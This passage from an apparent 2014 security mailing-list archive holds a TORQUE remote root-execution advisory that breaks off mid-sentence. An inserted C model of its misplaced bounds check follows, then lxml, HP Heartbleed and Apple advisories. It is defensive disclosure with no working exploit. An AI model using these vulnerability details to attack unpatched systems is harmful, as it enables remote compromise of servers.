execution as root. MWR have created a proof of concept exploit for TORQUE 
running on 64bit versions of CentOS which makes use of return oriented 
programming and ROP gadgets in order to execute arbitrary code as root. This 
vulnerability can be exploited reliably and remotely. It is possible to reach 
this path of execution from a remote and unauthenticated perspective (and 
regardless of whether the attacker's system is in the acl_hosts list or not). It 
is expected that code execution within a 32bit environment is simpler to 
achieve.

Whilst the necessary bounds check was found to be missing from all versions of 
TORQUE reviewed this issue was only found to be 
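
The misplaced bounds check described under [Technical Details] above, modelled as an added C example beside the corrected ordering; it is not TORQUE source or MWR's code. The names struct frame, stream_gets, read_digits_misplaced, read_digits_checked and SCRATCH_LEN are assumptions standing in for the decoder's buffer, tcp_gets(), disrsi_() and dis_umaxd, and the 12-digit field is constructed.

```c
#include <stddef.h>
#include <string.h>

#define SCRATCH_LEN 8  /* assumed stand-in for the dis_umaxd digit limit */
enum { RD_OK = 0, RD_EOD = -1, RD_OVERFLOW = -2 };
/* Constructed decoder frame: a digit buffer and the data that sits next to it. */
struct frame {
    char scratch[SCRATCH_LEN];
    char neighbour[SCRATCH_LEN];  /* stands in for adjacent stack contents */
};

/* Unread remainder of a request, held in memory for this model. */
struct stream { const char *leadp; size_t avail; };

/* Models the copy in tcp_gets(): limited by the stream, never by dst. */
static int stream_gets(struct stream *s, char *dst, size_t ct)
{
    if (ct > s->avail) return RD_EOD;
    memcpy(dst, s->leadp, ct);
    s->leadp += ct; s->avail -= ct;
    return RD_OK;
}

/* Misplaced check: count is compared with the limit only after the copy. */
int read_digits_misplaced(struct stream *s, struct frame *f, size_t count)
{
    int rc = stream_gets(s, (char *)f, count);  /* can run into neighbour */
    if (rc != RD_OK) return rc;
    return count > SCRATCH_LEN ? RD_OVERFLOW : RD_OK;  /* too late */
}

/* Corrected order: reject an oversized count before any byte is copied. */
int read_digits_checked(struct stream *s, struct frame *f, size_t count)
{
    if (count == 0 || count > SCRATCH_LEN) return RD_OVERFLOW;
    return stream_gets(s, f->scratch, count);
}

/* Feeds a constructed 12-digit field to one reader (12 <= sizeof f, so the
 * stray write stays inside f); returns 1 if neighbour survived. */
int neighbour_intact(int use_checked)
{
    struct frame f;
    struct stream s = { "333333333333", 12 };
    memset(&f, 0, sizeof f);
    memset(f.neighbour, 'N', sizeof f.neighbour);
    if (use_checked) read_digits_checked(&s, &f, 12);
    else read_digits_misplaced(&s, &f, 12);
    return f.neighbour[0] == 'N';
}
```

Both readers return RD_OVERFLOW for the oversized field, but only the checked one leaves neighbour untouched, which is why the error code alone does not show the bug.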

[ MDVSA-2014:088 ] python-lxml

2014-05-15 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2014:088
 http://www.mandriva.com/en/support/security/
 ___

 Package : python-lxml
 Date: May 15, 2014
 Affected: Business Server 1.0, Enterprise Server 5.0
 ___

 Problem Description:

 Updated python-lxml packages fix security vulnerability:
 
 The clean_html() function, provided by the lxml.html.clean module,
 did not properly clean HTML input if it included non-printed characters
 (\x01-\x08). A remote attacker could use this flaw to serve malicious
 content to an application using the clean_html() function to process
 HTML, possibly allowing the attacker to inject malicious code into
 a website generated by this application (CVE-2014-3146).
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3146
 http://advisories.mageia.org/MGASA-2014-0218.html
 ___

 Updated Packages:

 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/en/support/security/advisories/

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com



[security bulletin] HPSBMU02995 rev.7 - HP Software HP Service Manager, Asset Manager, UCMDB Browser, UCMDB Configuration Manager, Executive Scorecard, Server Automation, Diagnostics, LoadRunner, and

2014-05-15 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04236102

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04236102
Version: 7

HPSBMU02995 rev.7 - HP Software HP Service Manager, Asset Manager, UCMDB
Browser, UCMDB Configuration Manager, Executive Scorecard, Server Automation,
Diagnostics, LoadRunner, and Performance Center, running OpenSSL, Remote
Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2014-04-11
Last Updated: 2014-05-14

Potential Security Impact: Remote disclosure of information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
The Heartbleed vulnerability was detected in specific OpenSSL versions.
OpenSSL is a 3rd party product that is embedded with some of HP Software
products. This bulletin's objective is to notify HP Software customers about
products affected by the Heartbleed vulnerability.

Note: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found
in the OpenSSL cryptographic software library. This weakness
potentially allows disclosure of information protected, under normal
conditions, by the SSL/TLS protocol. The impacted products that appear in the
list below are vulnerable due to embedding OpenSSL standard release software.

References: CVE-2014-0160 (SSRT101499)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Product
 Impacted HP Product Versions
 Notes

HP Service Manager
 v9.32, v9.33
 Security bulletin HPSBGN03008: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04248997

HP Asset Manager
 v9.40, v9.40 CSC
 Security Bulletin HPSBMU03018: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04260505

HP UCMDB Browser
 v1.x, v2.x, v3.x
 Security bulletin HPSBMU03019: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04260353
 note: APR enabled on Tomcat includes an affected OpenSSL version

HP UCMDB Configuration Manager
 v9.1x, v9.2x, v9.3x, v10.01, v10.10
 Security bulletin HPSBMU03019: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04260353

HP CIT (ConnectIT)
 v9.52, v9.53
 Security bulletin HPSBMU03017: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04260456

HP Executive Scorecard
 v9.40, v9.41

HP Server Automation
 v10.00, v10.01
 Security bulletin HPSBGN03010: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04250814

HP Diagnostics
 v9.23, v9.23 IP1
 Security bulletin HPSBMU03025: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04267775

HP Business Process Monitor
 v.9.23, v.9.24

HP LoadRunner
 v11.52, v12.0
 Security bulletin HPSBMU03040: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04286049

HP Performance Center
 v11.52, v12.0
 Security bulletin HPSBMU03040: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04286049

HP Autonomy WorkSite Server
 v9.0 SP1 (on-premises software)
 Security bulletin HPSBMU02999: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04239374

Impacted Versions table

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2014-0160(AV:N/AC:L/Au:N/C:P/I:N/A:N)   5.0
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP Software is working to address this vulnerability for all affected product
versions. HP Software will release product specific security bulletins for
each impacted product. Each bulletin will include a patch and/or mitigation
guideline. HP will update this bulletin with references to security bulletins
for each product in the impacted versions table.

Note: OpenSSL is an external product embedded in HP products.

Bulletin Applicability:

This bulletin applies to each OpenSSL component that is embedded within the
HP products listed in the security bulletin. The bulletin does not apply to
any other 3rd party application (e.g. operating system, web server, or
application server) that may be required to be installed by the customer
according to instructions in the product install guide.

To learn more about HP Software Incident Response, please visit
http://www8.hp.com/us/en/software-solutions/enterprise-software-security-center/response-center.html .

Software updates are available from HP Software Support Online at
http://support.openview.hp.com/downloads.jsp

HISTORY
Version:1 (rev.1) - 11 April 2014 Initial release
Version:2 (rev.2) - 13 April 2014 Added HP 

APPLE-SA-2014-05-15-1 OS X Mavericks v10.9.3

2014-05-15 Thread Apple Product Security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

APPLE-SA-2014-05-15-1 OS X Mavericks v10.9.3

OS X Mavericks v10.9.3 is now available and includes the content of
Security Update 2014-002. For further details see About 
Security Update 2014-002 at http://support.apple.com/kb/HT6207


OS X Mavericks v10.9.3 may be obtained from the Mac App Store.

Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
